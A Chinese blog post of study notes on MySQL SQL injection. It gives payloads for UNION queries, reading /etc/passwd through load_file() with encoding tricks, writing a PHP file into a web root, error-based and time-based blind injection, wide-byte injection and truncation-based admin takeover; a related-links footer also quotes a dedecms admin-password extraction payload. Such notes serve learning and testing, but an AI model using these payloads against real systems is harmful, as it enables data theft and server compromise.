MySQL常用注入方式总结笔记

最新推荐文章于 2024-05-24 15:55:04 发布
最新推荐文章于 2024-05-24 15:55:04 发布
阅读量912 收藏 2
点赞数 1
分类专栏: 笔记 文章标签: mysql 数据库 python php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/109591436
版权

目录

MySQL中的注释

MySQL支持以下三种注释风格:

  • #:注释从"#"字符到行尾
  • --:注释从"--"序列到行尾。需要注意用此注释后面需要跟一个或多个空格。注:空格与tag都可以
  • /* */:注释从/*序列到后面*/序列中间的字符

其中,/* */注释有个特点,观察以下sql语句:

select id/*!55555, username*/ from users

这句语句是能正常运行并输出的,/* */注释没有起任何作用,其实这并不是注释,而是/* !*/,感叹号是有特殊意义的,比如上面的/*!55555, username*/意思是:若MySQL的版本号高于或者等于5.55.55,语句将会被执行,如果!后面不加入版本号,MySQL将会直接执行SQL语句。

获取元数据

MySQL5.0及以上版本提供了information_schema,information_schema是信息数据库,它提供了访问数据库元数据的方式。
1.查询用户数据库名称:

select schema_name from information_schema.schemata limit 0,1

2.查询当前数据库表:

select table_name from information_schema.tables where table_schema=(select database()) limit 0,1

3.查询指定表的所有字段:

select column_name from information_schema.columns where table_name=‘Student’ limit 0,1

我之前还写过一篇关于此处知识点的CTF实例,有兴趣的同学可以去看看:
https://blog.csdn.net/EC_Carrot/article/details/109159071

UNION查询

MySQL官方解释UNION查询用于把来自许多SELECT语句的结果结合到一个结果集合里面中,且每列的数据类型必须相同。
示例查询语句:

select id,username,password from users union select 1,2,3

值得一说的是,这句语句除了在MySQL中能运行成功并正常返回之外,在SQL Server与Oracle均显示语句错误,数据类型不匹配,无法正常运行
由此发现,在SQL Server与Oracle中,列的数据类型在不确定的情况下,最好使用null关键字来匹配
如:

select id,username,password from users union select null,null,null

MySQL函数利用

(1)load_file()函数读文件操作
使用MySQL读磁盘文件是非常简单的,它提供了load_file()函数,可以帮助用户快速读取文件,但文件必须在服务器上,需提供绝对路径,且必须持有FILE权限,文件容量必须小于max_allowed_packet字节(默认为16MB,最大为1GB)
语句如下:

union select 1,load_file(’/etc/passwd’),3 #

通常一些防注入语句不允许单引号出现,那么可以使用一下语句绕过:

union select 1,load_file(0x2F6563742F706173737764),3 #

0x2F6563742F706173737764为"/etc/passwd"十进制ascii码转换结果,或者使用:

union select 1,load_file(char(47,101,99,116,47,112,97,115,115,119,100)),3 #

char() 将参数解释为整数并且返回 由这些整数的ASCII代码字符组成的一个字符串。NULL值 被跳过。
在SQL注入中,经常会使用函数组合来达到某种目的,如:在浏览器返回数据时,可能会存在乱码问题,那我们可以用hex()函数

union select 1,hex(load_file(char(47,101,99,116,47,112,97,115,115,119,100))),3 #

将字符串转换为十进制ASCII码数据这里可以去看看我的另外一篇文章:
https://blog.csdn.net/EC_Carrot/article/details/109596468

(2)into outfile写文件操作
和load_file()一样,写文件操作需要FILE权限,并且文件为全路径名称(在windows中路径均需用两个反斜杠)
语句如下:

select ‘<?php phpinfo ?>’ into outfile ‘/var/www/1.php’
select char(60,112,104,112,63,32,112,104,112,105,110,102,111,32,63,62) into outfile ‘/var/www/1.php’

这里的字符串转换ascii码
(3)连接字符串
在MySQL查询中,如果需要一次查询多个数据,可以使用concat()或concat_ws()函数来完成。
1.concat()函数

select name from student where id=1 union select concat(user(),’,’,database(),’,’,version());

concat函数中的逗号也可以用十六进制表示concat(user(),0x2c,database(),0x2c,version())
2.concat_ws()函数
如果觉得concat比较麻烦,可以使用concat_ws(),它会比concat函数更加简洁

select name from student where id=1 union select concat_ws(0x2c,user(),database(),version());

MySQL显错式注入

1.通过updatexml()

select * from message where id=1 and updatexml(1,(concat(0x7c,(select @@version))),1);

2.通过extractvalue()

select * from message where id=1 and extractvalue(1,concat(0x7c,(select user())));

3.通过floor()

select * from message where id=1 union select * from (select count(*),concat(floor(rand(0)*2),(select user()))a from information_schema.tables group by a)b

宽字节注入

宽字节注入是由编码不统一所导致的,这种注入一般出现在PHP+MySQL中。
在PHP配置文件php.ini中存在magic_quotes_gpc选项,被称为魔术引号,这会让正常接收的GET、POST、Cookie的单引号、双引号、反斜杠和NULL字符都加上一个反斜杠转义,这会让输入的单引号没法闭合本该有注入点的语句。
宽字节注入就是突破PHP转义的技术,如:
输入http://www.xx.com/get.php?id=%d5' #,显示结果会是,此处的单引号没有被转义,而是成功闭合了前面的语句

MySQL长字符截断(SQL约束攻击)

MySQL中的一个设置叫sql_mode选项,当该选项为default时,即没有开启STRICT_ALL_TABLES选项时(MySQL的sql_mode选项默认为default),MySQL对插入超长的值只会显示warning,而不是error,这样就会导致一些截断问题。
比如有一处管理员登录是这样判断的,语句如下:

select count(*) from users where username=‘admin’ and password=’********’

而它的表中对username格式类型长度限制只有7

{id int(11) NOT NULL,username varchar(7) NOT NULL,password varchar(12) NOT NULL}

那么这时,我们仅需要注册一个"admin           "用户即可轻易的进入后台管理页面。
因为,在注册"admin           "用户时,语句为:

insert into users(id,username,password) values(2,'admin          ',‘admin’);

会成功插入数据,但会有一个warning警告,但数据已经插入到数据库里了!
用length函数去判断id为2的admin用户长度会是为7,而本该在的admin管理员用户长度为5,由此可见,在默认情况下,如果数据超出列默认长度,MySQL会将其截断,再插入到表中。

延迟注入

延迟注入属于盲注的一种,是一种基于时间差异的注入技术
MySQL中,有一个函数sleep(),作用是在给定秒数后运行语句,例:

select * from users where id=1 and sleep(3);

即为在3秒后执行sql语句
知道此函数后,那么就可以拿来判断URL是否存在SQL注入漏洞,步骤如下:

?id=1 //返回正常,1秒左右打开页面
?id=1 ’ //返回正常,1秒左右打开页面
?id=1 ’ and 1=1 //返回正常,1秒左右打开页面
?id=1 ’ and sleep(3) //返回正常,3秒左右打开页面

这样一来,就可以判断出URL存在SQL注入漏洞
网上的延迟注入语句都是大同小异的,这里不再过多赘述,仅讲注入思路:

  1. 查询当前用户,取得字符串长度。
  2. 截取字符串第一个字符,并转换成ascii码
  3. 将该ascii码与ascii码表对比,如果对比成功则页面延迟3秒后输出
  4. 继续该步骤直到字符串截取完成

对于语句如下

  1. and if(length(user())=0,sleep(3),1)
  2. and if(hex(mid(user(),1,1))=1,sleep(3),1)
  3. and if(hex(mid(user(),L,1))=N,sleep(3),1)

注:L的位置表示字符串的第几个字符,N的位置代表ascii码。
该思路用在延迟注入脚本中同样适用。

小 白 萝 卜
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MySQL常用笔记
alviss_kdd的博客
10-12 1049
文章目录tips锁解决相关mysqldump 导出问题mysql重要性质mysql 安装准备工作单实例安装多实例安装Mysql 权限最简单的 MySql 权限深入研究下 MySQL 权限用户标识是什么用户权限涉及的表Mysql 的角色准备工作创建一个角色创建 2 个开发人员账号把两个用户加到组里面给角色 dev_role 应该有的权限测试MySql数据类型int类型有无符号INT(N)是什么?自动增长的面试题字符类型排序规则时间类型json类型MySQL架构体系架构图连接层SQL处理层查询缓存解析查询顺序优
渗透之SQL注入-MYSQL常用语法
时光
07-13 1349
渗透测试之sql注入mysql的基本用法
MYSQL注入的入门注解
gsdgdg00的博客
12-06 1076
📑打牌 : da pai ge的个人主页 🌤️个人专栏 : da pai ge的博客专栏 ☁️宝剑锋从磨砺出,梅花香自苦寒来最常见的SQL注入漏洞类型是基于输入的注入漏洞和基于输出的注入漏洞。基于输入的注入漏洞是指攻击者利用web应用程序中没有正确过滤用户输入数据的漏洞,直接将恶意代码插入到SQL查询中。基于输出的注入漏洞是指攻击者利用web应用程序返回给用户的错误
SQL注入MYSQL注入总结-20240517更新mysql可报错注入函数
qq_39764475的博客
08-12 2086
简介 information_schema是用于存储数据库元数据的表,它保存了数据库名,表名,列名等信息。 让我们从爆破表名到了可以直接查询。 information_schema是MySQL5.0以上数据库独有,MYSQL4.X的没有,只能进行对库名、表名、列名暴力破解。 基本使用 基本语法 1.建立数据库 mysql> create database mysqltest; Query OK, 1 row affected (0.00 sec) 2.查询所有数据库 mysql> show d
Mysql注入详细讲解
最新发布
2401_84466359的博客
05-24 799
*原理:**用户向数据库里存入恶意的数据,在数据被插入到数据库之前,肯定会对数据库进行转义处理,但用户输入的数据的内容肯定是一点摸样也不会变的存进数据库里,而一般都默认为数据库里的信息都是安全的,查询的时候不会进行处理,所以当用户的恶意数据被web程序调用的时候就有可能出发SQL注入。GET/POST提交数据时,发现提交的数据被加密了(可能js加密),那么在提交数据前,抓包,解密,将注入语句写好,然后将整个语句进行加密(相同加密算法),再将数据发过去。HTTP 头注入常常发生在程序采集用户信息的模块中。
mysql数据库注入_MYSQL数据库注入总结
weixin_42554162的博客
01-19 262
MS SQL是指微软的SQLServer数据库服务器,它是一个数据库平台,提供数据库的从服务器到终端的完整的解决方案,其中数据库服务器部分,是一个数据库管理系统,用于建立、使用和维护数据库。SQLServer一开始并不是微软自己研发的产品,而是当时为了要和IBM竞争时,与Sybase合作所产生的,其最早的发展者是Sybase,同时微软也和Sybase合作过SQL Server 4.2版本的研发,微...
dedecms有条件sql注入(x0day)
weixin_34161064的博客
08-29 91
https://www.t00ls.net/thread-35569-1-1.html http://localhost/dedecms/plus/advancedsearch.php?mid=1&_SESSION[123]=select concat(0x7c,userid,0x7c,pwd,0x7c) as aid from `%23@__admin` aaa &sql...
MySQL注入总结
a740325713的博客
09-16 493
0x01 MySQL 5.0以上和MySQL 5.0以下版本的区别 MySQL5.0以上版本存在一个叫information_schema的数据库,它存储着数据库的所有信息,其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型和访问权限等。而5.0以下没有。 information_schema 系统数据库,记录当前数据库的数据库,表,...
手工注入常用SQL语句笔记.docx
04-10
手工注入常用 SQL 语句笔记 ...手工注入常用 SQL 语句笔记MySQL 和 MSSQL 两种数据库管理系统进行了详细的介绍,涵盖了注入原理、实战心得、判断数据库类型、常用内置函数使用、数据库的扩展存储过程等方面的内容。
MySQL笔记(狂神说java)
09-25
"狂神说Java"的MySQL笔记可能深入探讨了如何在Java编程环境中与MySQL进行交互,这对于我们理解数据库管理和开发至关重要。以下是对这个主题的详细阐述: 1. **MySQL基础**: - 数据库概念:MySQL是一个用于存储和...
MySQLDBA运维笔记.pdf
11-04
mysql 总结........................................................................................................................................6 1.1 数据库的种类.......................................
基于SSM框架+mysql搭建的云笔记系统(仿有道云笔记)源码.zip
08-29
本项目是一个基于SSM框架和MySQL数据库搭建的云笔记系统,模仿了知名的有道云笔记,旨在提供类似的功能和服务。 1. **Spring框架**:Spring是核心容器,负责管理应用中的对象,包括依赖注入(DI)和面向切面编程...
PHP学习总结笔记.pdf
11-12
PHP支持面向过程和面向对象两种编程方式。PHP 4的面向对象功能有限,而PHP 5引入了完整的对象模型,增强了OOP能力。PHP 5以上的版本更适合进行面向对象的编程。 【面向对象思想】 面向对象编程(OOP)是PHP的核心...
MYSQL注入总结
qq_39654116的博客
01-04 427
总结 联合注入的优势是自带多个显位,可以很快爆出数据,缺点是只能用在select最后处,后面如果还有sql语句就必须注释掉。而且必须用到union和select,很容易被拦截。 特定变量 常用变量 1. SCHEMATA表 : 提供了当前mysql实例中所有数据库的信息。 2. TABLES 表 : 提供了关于数据库中的表的信息。 3. COLUMNS 表 :提供了表中的列信息 select … union select … SELECT Company, OrderNumber FROM Orders O
mysql整段注释_Mysql经典SQL注入(注释法:# 或 --)
weixin_39785081的博客
12-20 580
所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。我们永远不要信任用户的输入,我们必须认定用户输入的数据都是不安全的,我们都需要对用户输入的数据进行过滤处理。问题显现://组织SQL指令:获取用户信息$sql = "select * from {$this->getTable()} where u_usernam...
mysql注入时的注释处理
iLdf的专栏
01-08 6215
我们在碰到字符型注入点时,要想办法把原查询SQL语句后面的单引号消掉才能让注入语句执行成功,我所知道常用的办法有以下几种(也许还有其他办法,望高手指教),假设查询字段数为两个且只用到一个字符型条件参数:1、加注释,如:showtopic.php?key=abc and 12、union方式,如:showtopic.php?key=abc and 1 13、特殊情况
mysql注入总结
yu__sir的博客
08-25 987
mysql注入总结mysql注入总结 理论知识 注释符 包裹数据方式 系统函数等 数据库知识 注入 基本注入流程 盲注 三过滤绕过 其他理论知识注释符:# --+ /**/包裹数据方式一般情况下包裹数据会有一下的几种方式,手动测试,不确定什么包裹的时候,可以一个一个的实验(当然这是大部分情况,也会有一些奇葩的存在) '' ('') (('')) "" ("") ((""))系统函数等:此
史上最完整的MySQL注入
热门推荐
xiaoi123的博客
09-07 1万+
作者:Passerby2 原文来自:史上最完整的MySQL注入 免责声明:本教程仅用于教育目的,以保护您自己的SQL注释代码。 在阅读本教程后,您必须对任何行动承担全部责任。 0x00 ~ 背景 这篇文章题目为“为新手完成MySQL注入”,它旨在提供专门针对MySQL数据库的SQL注入的完整知识和工作方式,除了堆栈查询部分。 这里的第一个贡献...... 表中的内容 介绍 ...
mysql注入 —— union
SPS98
05-07 644
union可以用于合并两个或多个select语句的结果集 场景: PHP中使用的查询代码大致如下(可能有语法错误) $id = $_GET['id']; $sql = "select * from users where id = '$id' limit 0, 1"; $result = mysqld_query($sql); $row = mysqld_fetch_array($result)...
"MySQL基础操作与常用命令总结笔记
本文将总结一些关于MYSQL的重要知识点和常用命令。 首先,MYSQL的基本操作主要包含SQL语法和一些常用MYSQL命令。SQL是结构化查询语言的简称,用于在关系型数据库中进行数据的增删改查。MYSQL是一种基于SQL语法的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值